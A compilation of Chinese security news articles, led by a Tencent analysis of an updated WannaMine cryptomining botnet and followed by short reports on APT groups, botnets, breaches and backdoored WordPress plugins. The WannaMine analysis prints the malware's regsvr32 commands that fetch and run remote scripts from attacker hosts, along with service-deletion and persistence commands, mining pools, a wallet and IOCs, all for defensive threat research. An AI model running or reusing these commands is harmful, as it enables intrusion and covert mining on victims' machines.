感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/GGD563kHbxrvt-XRitjUbQ 一、背景 腾讯安全御见威胁情报中心检测到WannaMine挖矿僵尸网络再度更新，WannaMine最早于2017年底被发现，主要采用Powershell“无文件”攻击组成挖矿僵尸网络。更新后的WannaMine具有更强的传播性，会采用多种手法清理、阻止竞争木马的挖矿行为，同时安装远控木马完全控制中毒系统。 本次更新后的WannaMine病毒具有以下特点： 利用“永恒之蓝”漏洞攻击传播； 利用mimiktaz抓取域登录密码结合WMI的远程执行功能在内网横向移动； 通过添加IP策略阻止本机连接对手木马的47个矿池，阻止其他病毒通过“永恒之蓝”漏洞入侵； 添加计划任务，WMI事件消费者进行持久化攻击，删除“MyKings”病毒的WMI后门； 利用COM组件注册程序regsvr32执行恶意脚本； 利用WMIClass存取恶意代码； 在感染机器下载Gh0st远控木马conhernece.exe和门罗币挖矿木马steam.exe。 二、详细分析 WannaMine安装计划任务进行持久化，计划任务名：’Microsoft\Windows\MUI\LMRemove’， ‘Microsoft\Windows\Multimedia\SystemEventService’，执行以下命令： regsvr32 /u /s /i:http://safe.lxb.monster/networks.xsl scrobj.dll regsvr32 /u /s /i:http://skt.xiaojiji.nl/networks.xsl scrobj.dll Regsvr32.exe是一个命令行程序，用于在Windows系统上注册和注销对象链接和嵌入控件，包括动态链接库（DLL），Regsvr32.exe可用于执行任意二进制文件。由于regsvr32.exe支持网络代理，因此可以通过在调用期间将统一资源定位符（URL）作为参数传递外部Web服务器上的文件来加载脚本。 在计划任务执行时，恶意脚本networks.xsl被Regsvr32.exe执行。networks.xsl实际上使用XML语言描述，其中被嵌入了一段JScript脚本，功能为通过CMD命令执行一段加密的Powershell代码。 两段Powershell代码解码后如下： 分别从http[:]//skt.xiaojiji.nl/networks.ps1和 http[:]//safe.dashabi.nl/networks.ps1下载得到文件networks.ps1。networks.ps1经过加密的Powershell脚本，也是是核心攻击代码。代码首先中定义了三个变量$miiiiii ，$fffffff，$ssssssss来分别保存加密数据，然后继续执行，后续代码中会读取并解密变量中的数据。 变量之后的代码以字符“&( $VerBOsepreFErEnce.ToSTrinG()[1,3]+’X’-joiN”)“开头，这段字符在Powershell的混淆代码中较为常见，功能等同于Powershell命令中的“IEX”（Invoke-Expression），IEX用于将字符串作为命令执行，当去掉IEX后，执行后就会显示原本的字符串。 我们将这段字符替换为自定义输出命令“write-host”，即可得到解码后的Powershell代码。 核心Powershell删除竞争对手安装的WMI后门代码，包括属于MyKings僵尸网络的“fuckyoumm3” ,“fuckyoumm4”,”fuckyoumm”,“fuckamm3”后门，以及属于未知团伙的“BotFilter82“，“BotConsumer23”,” BotFilter82”后门。 然后通过以下代码安装WMI事件消费者，其中事件过滤器名$filterName = (‘Windows Events Filter’)，事件消费者名$consumerName = (‘Windows Events Consumer’)。当捕获到指定的事件发生时执行恶意代码”$EncodedScript”，达到持久化攻击的目的。 对比2019年4月WannaMine代码可以发现基础设施已发生变化： 旧版： 备用服务器地址：profetestruec.net、45.199.154.108、172.247.116.87 默认下载地址：172.247.116.8 默认端口：8000 核心Powershell：in6.ps1,in3.ps1 新版： 备用服务器地址：safe.dashabi.nl、45.77.148.102、skt.xiaojiji.nl 默认下载地址：skt.xiaojiji.nl 默认端口：80 核心Powershell：network.ps1 申请一个名为“root\default:System_Anti_Virus_Core “的WMI对象，将变量中的数据保存到WMIClass当中以备后续使用。 接着从变量$fffffff中获取代码$defun执行。 $defun中函数Download_file()负责下载文件并保持到temp目录下。 RunDDOS()负责启动DDOS进程。 RunXMR()负责启动门罗币挖矿进程。 KillBot()负责清除竞争对手，杀死进程命令行包含字符“System_Anti_Virus_Core “，”cryptonight “的进程，同时杀死使用端口3333、5555、7777进行TCP通信的进程。 实现了“永恒之蓝“漏洞攻击代码，攻击函数为eb7()、eb8()。、 Get-IpInB()函数从网卡配置信息中获取IP地址，取A段和B段作为IP地址开头，然后随机生成C段和D段组成待攻击的IP地址列表。 在Test-Port()中测试IP地址是否开放445端口，在Get-creds()中通过密码抓取工具mimiktaz获取当前域登录密码，得到Username、Domain、Password/NTLM数据并保存。 密码搜集工具mimiktaz由初始阶段定义的三个变量之一的$miiiiii解密获得。在Test-ip()中针对mimiktaz获取到域登录凭证的IP进行攻击，利用WMI的远程命令执行功能，调用Invoke-WmiMethod执行远程Powershell命令（64位执行 http[:]//safe.dashabi.nl/networks.ps1，32位执行http[:]//safe.dashabi.nl/netstat.ps1）。 核心Powershell利用“永恒之蓝“漏洞攻击工具进行攻击。首先调用[PingCastle.Scanners.m17sc]::Scan()进行漏洞扫描，将存在漏洞的IP保存至$i17中，然后调用攻击函数eb7()和eb8()进行攻击。 在目标系统执行shellcode命令$sc，该命令内容由之前的三个变量之一$ssssssss中解密得到，主要功能为判断WMI中是否存在root\Subscription -Class __FilterToConsumerBinding命名空间下的null对象或者不含“Windows Events Filter“字符的对象，如果是则执行远程恶意代码：http[:]//207.246.124.125/networks.ps1 RunDDOS（Gh0st远控木马） Networks.ps1中解码出$fffffff后，调用其函数RunDDOS ，指定参数”cohernece.exe”，从http[:]//safe.dashabi.nl/coherence.txt下载二进制数据，并还原成PE文件cohernece.exe到%Temp%目录下，通过start-process命令执行。 分析发现，该文件当前并非DDOS木马，而是Gh0st远控木马，当前使用的C&C地址为six.lxb.monster:8447。 Gh0st远控木马较为常见，技术分析从略。 RunXMR Networks.ps1中解码出$fffffff后，调用其函数RunXMR，指定参数”steam.exe”，从http[:]//safe.dashabi.nl/steam.txt下载二进制数据，并还原成PE文件steam.exe到%Temp%目录下，通过start-process命令执行。steam.exe为自解压程序，解压目录为c:\windows\fonts\Wbems\，解压结束后首先执行bat脚本c:\windows\fonts\Wbems\1.bat。 再次删除竞争对手的服务： sc stop “evemt windows” sc delete “evemt windows” sc stop “event log” sc delete “event log” sc stop ias sc delete ias sc stop FastUserSwitchingCompatibility sc delete FastUserSwitchingCompatibility sc stop MicrosoftMysql sc delete MicrosoftMysql 设置解压目录下的木马文件为隐藏、系统属性： attrib -a -s -h c:\windows\fonts\Wbems\*.exe 启动c:\windows\fonts\Wbems\ipp.exe，该文件也是Gh0st远控木马。 将解压出的病毒文件拷贝到目标目录下 netsh ipsec static importpolicy file=c:\windows\fonts\Wbems\close.ipsec，将木马释放的IP安全策略文件close.ipsec导入到当前机器。 close.ipsec通过配置IP筛选器，阻止本机向其他47个矿池IP地址发起的TCP网络连接，从而阻止竞品木马的挖矿行为。 阻止任何地址与本机的139/445端口的TCP或UDP通信，包括局域网和远程连接，从而阻止其他病毒通过“永恒之蓝”漏洞入侵。 通过SetACL.exe修复注册表”HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs\Narrator”的访问属性，并在该注册表下写入StartExe值，利用微软”The Ease of Access Center”（便捷访问中心）特性来启动木马uas.exe。 然后通过服务管理程序msdtc，将挖矿木马xx.exe安装为服务”Event Logs”并启动服务。设置服务的DisplayName和Description值如下： DisplayName “USO Services” Description “Manages profiles and accounts on a SharedPC configured device” 挖矿程序xx.exe采用XMRig 5.4.0版本编译，支持CPU和NVIDIA CUDA显卡GPU挖矿（4.5.0以后）。 使用以下矿池： xmr.wulifang.nl:80 91.121.140.167:443 hash.wulifang.nl:80 131.153.76.130:443 xme.wulifang.nl:13531 47.101.30.124:13531 fr.minexmr.com:80 钱包： 44AVCF3zFkWLKYrXQ7A2L4MjWxhJNxzZZczD8N9LjEbE9PCwdjRg1iJ4oHedTxngSVKKV8H74ZDXgHoq9Wgt3cVkJn3eNbS 三、安全建议 根据该病毒的技术特点，我们建议企业采取以下措施加以防范： 使用安全的密码策略，切勿使用弱口令； 及时修复Windows系统漏洞，推荐使用腾讯御点、腾讯电脑管家、或Windows Update修补漏洞，亦可参考以下链接重点修复永恒之蓝相关漏洞；（1）MS17-010永恒之蓝漏洞补丁下载地址：（2）XP、WindowsServer2003、win8等系统访问：http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598（3）Win7、win8.1、Windows Server 2008、Windows10,WindowsServer2016等系统访问：https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx 尽量关闭不必要的端口，如：445、135，139等，对3389，5900等端口可进行白名单配置，只允许白名单内的指定IP连接登陆； 对没有互联需求的服务器/工作站内部访问设置相应控制，避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器； 当系统出现异常时，检查计划任务和WMI（可用WMITools.exe）中是否有存在可疑脚本命令 推荐企业使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 45.77.148.102 207.246.124.125 Domain safe.dashabi.nl safe.lxb.monster six.lxb.monster skt.xiaojiji.nl URL http[:]//safe.lxb.monster/networks.xsl http[:]//skt.xiaojiji.nl/networks.xsl http[:]//skt.xiaojiji.nl/networks.ps1 http[:]//safe.dashabi.nl/networks.ps1 http[:]//safe.dashabi.nl/netstat.ps1 http[:]//207.246.124.125/networks.ps1 http[:]//safe.dashabi.nl/coherence.txt http[:]//safe.dashabi.nl/steam.txt 参考链接： WannaMine挖矿木马更新基础设施 新手法已大赚17万 WannaMine挖矿木马再活跃，14万台linux系统受攻击

外媒报道称，微软刚刚清理了由朝鲜网络黑客组织 APT37 运营的 50 个域名。软件巨头称，这些域名一直被 Thallium（亦称作 PT37）组织用于发动网络攻击。通过持续数月的关注、监视和追踪，该公司数字犯罪部门（DCU）和威胁情报中心（MSTIC）团队得以厘清 Thallium 的基础架构。 12 月 18 日，总部位于雷德蒙德的微软，在弗吉尼亚法院向 Thallium 发起了诉讼。圣诞节过后不久，美当局即批准了法院命令，允许该公司接管被朝鲜黑客用于攻击目的的 50 多个域名。 此前，这些域名常被用于发送网络钓鱼电子邮件和网站页面。黑客会诱使受害者登陆特制的站点，窃取凭证，从而获得对内部网络的访问权限，并执行后续针对内网的升级攻击。 微软表示，除了追踪该组织的网络攻击，该公司还调查了被感染的主机。微软企业客户副总裁 Tom Burt 表示： “攻击主要集中在美、日、韩三国的目标，受害者包括了政府雇员、智囊团、高校工作人员、平权组织成员、以及普通人”。 在诸多案例中，黑客的最终目标是感染受害机器，并引入 KimJongRAT 和 BabyShark 两个远程访问木马（RAT）。 Tom Burt 补充道：“一旦将恶意软件安装在受害者计算机删，它就会从中窃取信息，保持潜伏并等待进一步的指示”。 当然，这并不是微软首次通过法院命令来阻断有外国背景的黑客组织的运作。 此前，微软曾对有俄方背景的 Strontium（又名 APT28 或 Fancy Bear）黑客组织发起过 12 次行动（上一次是 2018 年 8 月）、并成功撤下了 84 个域名。 以及通过法院命令接管了与伊朗有关的网络间谍组织 Phosphorus（APT35）运营的 99 个域名。   （稿源：cnBeta，封面源自网络。）

专家们发现了一种被FIN7网络犯罪集团称为BIOLOAD的新型加载程序，该程序被用在Carbanak 后门作为新变化的释放器。 Fortinet EnSilo的研究人员发现，被称为BIOLOAD的新型的装载程序与FIN7黑客组织有关联。 Fin7黑客组织自2015年末开始活跃，活动目标是窃取全球范围内的企业支付卡信息，目前疑似已经袭击了100多家美国公司，袭击领域主要集中在其在餐饮、酒店和工业等行业。2018年8月，臭名昭著的FIN7网络犯罪集团三名犯罪人员被起诉，并受到网络欺诈、黑客入侵、盗取身份密码等行为的指控。 此外，BIOLOAD加载程序与BOOSTWRITE加载程序还存在极大的关联。 从相似角度看，BOOSTWRITE也是一个与FIN7组织相关联的加载程序，它也能够将恶意软件直接放入内存，但BIOLOAD通过二进制植入技术，采用dll的劫持方法，将恶意代码加载到合法程序中。 在研究过程中，Fortinet EnSilo的研究人员在FaceFodUninstaller.exe二进制文件中发现了一个恶意的动态链接库，这个链接库从windows 10 1803中开始清理安装Windows OS.此外，研究人员还发现黑客们在DLL“Winbio”所在的“\ System32 \ WinBioPlugIns”文件夹中被植入了恶意的WinBio.dll。 从不同角度看，BIOLOAD装载机样本于分别2019年3月和7月进行了编制，而BOOSTWRITE样本于5月编制。在加载器上，BIOLOAD不支持多个有效载荷，而使用XOR来解密有效载荷，并不是ChaCha密码。在秘钥连接上，BIOLOAD从受害者的名字中获得解密密钥而不是连接远程服务器来获取解密密钥。 2019年1月至4月的时间戳显示，BIOLOAD加载器主要被用来进行程序攻击，并进行Carbank病毒传输。专家发现，这些新的Carbank 病毒样本在对受感染的机器运行上针对防病毒解决方案检查相比以往会更多。而根据针对恶意软件攻击观察的TTPs分析表明：BIOLOAD是由FIN7网络犯罪集团开发的，很可能是BOOSTWRITE的前身。 Fortinet因此得出结论：“这是第一起FaceFodUninstaller.exe被威胁行为者滥用的主体案件，Fin7拥有最新工具的共享代码库，以及同样的技术和后门，导致了因加载程序而引发网络犯罪。时间戳以及更简单的功能表明BIOLOAD是在BOOSTWRITE基础上的更新。” Fortinet建议：由于加载程序是专门为每台目标计算机构建的，需要管理权限才能部署，因此建议相关部门要注意收集有关目标网络的信息。   消息来源：securityaffairs， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文

由于被一个名为Mozi的P2P僵尸网络入侵，Netgear、D-Link和Huawei路由器正积极检测Telnet弱密码。因该僵尸网络再次使用了部分代码，可判定该事件与 Gafgyt恶意软件相关。 360 Netlab的安全研究人员在发现该僵尸网络后，对其进行了为期四个月的监控，发现该僵尸网络主要目的是用于DDoS网络攻击。攻击行动首先会在torrent客户端和其他P2P端存储节点信息，然后通过DHT协议进行网络扩散。而这样的扩散行为会使得在无需服务器情况下建立的僵尸网络传播速度更快，也会导致大量僵尸网络在DHT协议中巧妙藏身，更难被检测。 此外，Mozi还使用了ECDSA384和XOR算法来保证僵尸网络组件和P2P网络的完整性和安全性。 恶意软件使用telnet并利用漏洞向新的易受攻击的设备进行传播，该行为主要通过登录加密性弱的路由器或CCTV DVR来实现，在成功利用未修复的主机后立刻执行负载。而恶意软件一旦载入受攻击设备，新激活的bot将自动加入Mozi P2P成为受攻击的新节点。在受感染后，新的网络节点将接收并执行僵尸网络主机的命令，此时Netgear、D-Link和华为路由器也会收到影响。 针对此现象，研究人员做出解释：Mozi在通过DHT协议建立p2p网络后，配置的网络设备会同步更新，相应的任务也会根据配置文件中的指令即刻启动。 以下是自360 Netlab研究人员自2003年9月监测Mozi以来发现的10个受感染的P2P未修补设备： 像Nugache、Storm（又名Peacomm）、Sality P2P、Waledac、Kelihos（又名Hlux）、ZeroAccess（又名Sirefefef）、Miner和Zeus这样的P2P僵尸网络从2006年初开始，就为他们的主人组建了庞大的僵尸网络系统，但现在大部分已经灭绝，而另一些设备如Hajime 、Hide’N Seek（简称HNS），他们仍在寻找易受攻击的设备。 2018年9月，Hide’N Seek在短短几天内感染9万多台设备，而Hajime自2016年秋季首次被发现以来，在短短6个月内，感染约30万台设备。 众所周知P2P僵尸网络对打击他们的下沉式攻击具有很强的弹性，但也不乏一些例子证明ZeroAccess和Kelihos是易受攻击的。 在更多关于Mozi的相关信息被检测出来之前，关于对它进行深层次攻击可能性的猜测从未间断。但可以肯定的是，在此项检测之前，若相关目标还未被修补，Mozi对信息的搜集扩散范围会越来越大。 除上述僵尸网络外，另一个名为Roboto的P2P僵尸网络在8月下旬被被同一个研究小组发现，该网络在互联网上还会对未修补Webmin安装的Linux服务器进行扫描，而有关这个新的P2P僵尸网络更多信息可在360 Netlab的Mozi报告末尾了解。   消息来源：bleepingcomputer， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链

据外媒报道，有人黑进了美国密西西比一户人家的环形安全摄像头，并且还用扬声器骚扰这家的8岁女孩。这名黑客告诉她自己是圣诞老人并还怂恿她破坏房间。这是近期发生的几起黑客在用户不知情的情况下登陆其Ring账号的攻击事件之一。 Ashley LeMay近日告诉媒体，她在自己女儿房间里安装了摄像头，这样她就可以在上夜班时照看她们。“在我买到它们之前做了很多研究。你知道，我真的觉得它是安全的。” 然而这次入侵就发生在她安装这款摄像头四天后，当时她正在出差，她的丈夫在家带孩子。 当她的女儿Alyssa听到自己卧室传出来声音后于是走进去看看究竟是什么。 从当事人分享的视频可以看到，Alyssa非常紧张地站在自己的房间里，黑客则远程播放了来自恐怖片《潜伏》里的歌曲《Tiptoe through the Tulips》。 “谁在那里，”Alyssa问道。 “我是你最好的朋友。我是圣诞老人。我是圣诞老人。难道你不想成为我最好的朋友吗？”黑客说道。 之后，这个匿名黑客继续骚扰Alyssa、嘲笑她并怂恿她破坏房间。 对此，这款摄像头厂商Ring在提供给媒体的声明中指出，黑客并不是通过数据泄露或破坏Ring的安全获取信息的，相反，这个人可能利用了这户人家账户的安全性。 根据声明，Ring用户经常会使用相同的用户名和密码来注册不同账户和订阅服务。“作为预防措施，我们强烈并公开鼓励所有Ring用户在其Ring账户上启用双重认证、添加共享用户（而不是共享登录凭证）、使用高安全性密码并定期更换密码。” Ashley表示，她还没有在她的设备上设置双重认证。   （稿源:cnBeta，封面源自网络。）

微软专家指出：GALLIUM黑客组织利用未修补的漏洞运行/JBoss应用服务器系统。 “目前微软威胁情报中心（MSTIC）在对GALLIUM黑客组织行为逐步了解中发现，其目标是电信供应商，为了破坏其目标网络，GALLIUM利用WildFly/JBoss中的公开漏洞对未修复的网络服务进行攻击。” GALLIUM 的行为表现活跃，尤其是2018年至2019年间格外明显。而攻击者一旦破坏了目标网络，他们将会使用常见的科技手段如Mimikatz来窃取可用的凭证。 专家指出，目前GALLIUM 正在使用一些版本常见的软件以及公开化的一些工具，这工具只需稍作改动，就可以逃避检测。运营商利用低成本和易于替换的基础设施，使用动态DNS域和定期重用的跃点。 MSTIC分析指出：使用动态DNS提供商而不是符合条件的注册域名，GALLIUM的低成本、低投入成为运营趋势。 在中国大陆、中国香港和中国台湾的基础设施中，且已观察到GALLIUM基础设施建设。 威胁行为很大程度上依赖于网络shell，通过此shell获得持久网络稳定，然后进行恶意软件传输。在这个阶段中，恶意软件的有效负载将会被舍弃，且不会通过稳定网络进行程序安装。 除了标准的 China Chopper外，该公司还为微软IIS服务器运行使用了一个名为blackmold的原生web shell。Blackmold能够找到出本地驱动器，并进行基本的文件操作如查找、读取、写入、删除和复制，设置文件属性，渗透文件，并使用参数运行cmd.exe。 该黑客组织还会提供个性化的Gh0st RAT和Poison Ivy服务版本，这两个版本都会修改软件使用通信方法。黑客还将QuarkBandit作为第二级恶意软件，专家称该软件具有修改配置选项和加密的Gh0st RAT变体。日前，研究人员还通过观察发现 GALLIUM使用VPN来进行网络持久的访问。 针对此问题，微软在报告中还公布了一份IOC指标列表。   消息来源：SecurityAffairs， 译者：dengdeng，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

随着假日购物季的到来，许多消费者可能正在考虑为自家升级一些智能设备，比如 Google Nest Home、Amazon Alexa 等智能扬声器，或者集成了语音助理的智能电视。然而美国俄勒冈州联邦调查局办公室指出，随着智能电视扮演着越来越多的娱乐和控制中心角色，网络犯罪分子已经将黑手伸向了这一领域，或对用户隐私造成严重的侵害。 FBI 的这一警告，本身是一种相当常识性的建议，资深网民早已对此见怪不怪。问题在于，除了麦克风之外，还有越来越多的智能电视集成了摄像头组件。 传统麦克风仅用于识别语音命令，而相机则能够用于用户识别和视频聊天。一些厂商或基于此，提供个性化的内容推荐。 然而在连上互联网之后，设备的隐私安全就被提上了重要的议程，因为有无数看不见的黑手向沾染用户的终端设备。 尽管带有这类功能的智能电视的普及率还较低，但黑客攻击事件确实存在、且并不罕见。显然，FBI 希望在引发大事件之前，尽早地培育消费者的忧患意识。 目前目前最常见的隐私风险，就是数据收集。在注册每一款网络服务的时候，几乎都逃不开这个话题。 遗憾的是，无论在智能电视、或其它物联网产品上，人们几乎没有仔细阅读相关提示的习惯。   （稿源：cnBeta,封面源自网络）

由于配置错误，Adobe使用的 Elasticsearch 数据库无需密码就能连接。这一故障导致近 750 万 Adobe Creative Cloud 用户的基本信息暴露在互联网上。 这些信息主要包括帐户信息，涵盖用户 ID、国家、电子邮件地址、以及用户使用的Adobe 产品，还有帐户创建日期、最后登录日期，用户是否是 Adobe 员工以及订阅和付款状态。不包括密码或财务信息。 10月19日，Security Discovery 的专家 Bob Diachenko 和 CompariTech 的技术记者Paul Bischoff 发现了这些被泄露的数据。两人通知了Adobe的安全团队，后者在当天对服务器进行了维护。 这一次的数据泄漏不像过去在其他公司发现的那样严重，因为它不包含密码，付款数据，甚至没有用户的真实姓名。 但是，尚不清楚其他人是否也访问了该数据库并下载了其内容。黑客有可能向那些暴露了电子邮件地址的用户发送钓鱼邮件，并盗取用户的 Creative Cloud 帐户拿去暗网销售。 Adobe 于10月25日在一篇博客文章中对这场事故作出了回应，并表示此次事故是因为配置错误，使得服务器被暴露在互联网上。     消息来源：ZDNet， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

BriansClub 通过贩卖信用卡中的个人信息而盈利，是世界最大的黑市网站之一，却与于不久前遭到了黑客的攻击。最先报告数据泄露事件的 Brian Krebs 表示，黑客窃取了超过2600万张信用卡的信息。 专家估计，从 BriansClub 泄漏的被盗卡总数约占黑市上可用卡的30％。 BriansClub 的管理员确认，网站的数据中心已于今年早些时候被黑客入侵，并且声称被盗数据已经删除，但有多个消息确认这些数据仍在BriansClub上销售。 Krebs 还是俄罗斯黑客论坛 Verified 的管理员。据他所说，BriansClub 的攻击者的昵称为 “ MrGreen” ，并且他还经营着一家与自己同名的信用卡店。 目前这名 “ MrGreen” 已经被 Verified 拉黑。     消息来源：SecurityAffairs， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接

伪造 WordPress 插件是黑客的常用攻击方式之一。然而安全人员近期发现了一些具有后门功能的插件，如 initiatorseo 和 updrat123 等。 黑客依照 UpdraftPlus 伪造了这些恶意插件。前者拥有超过 200 万活跃用户，并且会定期发布更新。 恶意插件隐藏在 WordPress 首页，只有使用具有特定User-Agent字符串（随插件而异）的浏览器才能看到它们。 即使原始感染源被删除，黑客也仍然可以在用户的电脑上建立后门，并且仍然具有对服务器的访问权限。 这些后门通过 POST 请求，将恶意文件上传到服务器。该请求包含了文件下载位置的远程 URL ，以及将在受感染服务器上创建的文件的路径和名称。 到目前为止，这些 POST 参数对于每个插件都是唯一的。 黑客利用插件，将文件（即5d9196744f88d5d9196744f893.php） 上传至站点根目录。他们将会用文件中的脚本对其他站点进行暴力攻击。就算是管理员也看不到通过 WordPress 插件安装的后门。 此外，受感染的网站可能会遭到恶意攻击，包括 DDoS 和暴力攻击，发送垃圾邮件或被用于挖矿。   消息来源：SecurityAffairs， 译者：r4938n，校审：吴烦恼 本文由 HackerNews.cc 翻译整理，封面来源于网络。 转载请注明“转自 HackerNews.cc ” 并附上原文链接